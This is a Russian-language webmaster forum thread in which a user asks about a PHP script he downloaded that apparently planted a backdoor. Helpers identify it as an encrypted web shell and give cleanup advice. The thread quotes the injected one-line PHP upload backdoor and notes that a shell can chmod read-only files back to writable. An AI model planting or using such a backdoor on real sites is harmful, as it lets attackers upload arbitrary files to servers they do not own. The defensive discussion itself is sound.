X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Безопасность загруженного скрипта, Подскажите пожалуйста, что за скрипт?
PRaiD
PRaiD
Topic Starter сообщение 29.1.2016, 13:50; Ответить: PRaiD
Сообщение #1


Здравствуйте.

Подскажите пожалуйста,
Я скачал и запустил файл у себя на сервере от этого сайта cataloguing.ru перед запуском выставил права доступа "444" (только просмотр).
Был заявлен как бесплатный прогон.
Насчет прогона не знаю, но через WebVisor вместо моего сайта выводится такая картинка:
Прикрепленное изображение


Обнаружил изменение в корневой директории в 1-2 файлах, была добавлена строчка:
Код
   <?php move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>


Вот сам файл: Прикрепленный файл  1.php ( 15,95 килобайт ) Кол-во скачиваний: 8


Подскажите, что делает данный код и достаточно ли просто удалить загруженный файл и отредактировать внесенные изменения в файлах?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 29.1.2016, 15:32; Ответить: kagtus
Сообщение #2


5 раз шифрованный шелл-скрипт.
удаляйте его, чистите измененные и ищите вновь появившиеся файлы.


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PRaiD
PRaiD
Topic Starter сообщение 29.1.2016, 19:10; Ответить: PRaiD
Сообщение #3


kagtus, какие возможности предоставляет добавленный код?
И, значит запуск скрипта для исполнения команд внутри сервера возможно с правами доступа только для чтения?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
winstrool
winstrool
сообщение 2.2.2016, 23:22; Ответить: winstrool
Сообщение #4


Если это шелл был и он выполняется от прав текущего пользователя, с кривыми настройками безопасности на сервере, можно менять права, т.е были права 0444, за счет php функции chmod меняем на 0644, что приводит к полноценному редактированию файла, так что вам необходимо навести профилактические меры безопасности и устранения подобных скриптов...

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Безопасность обмена: обменник -> наличные
35 metvekot 4796 24.3.2021, 20:17
автор: gaoduber
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыНесколько RSS вставить в HTML скрипта
возможно такое или нет?
0 MihalychAIP 709 26.1.2021, 14:45
автор: MihalychAIP
Открытая тема (нет новых ответов) Срочно нужен прогер по WordPress для доработки скрипта
1 kolyas 773 5.5.2020, 12:09
автор: kolyas
Открытая тема (нет новых ответов) Продажа Скрипта Flip-Cash
0 ilyaz1110 709 19.4.2020, 14:04
автор: ilyaz1110
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродажа скрипта рекламной сети Push уведомлений
5 inpushpro 1626 22.3.2020, 1:50
автор: inpushpro


 



RSS Текстовая версия Сейчас: 11.4.2021, 17:33
Дизайн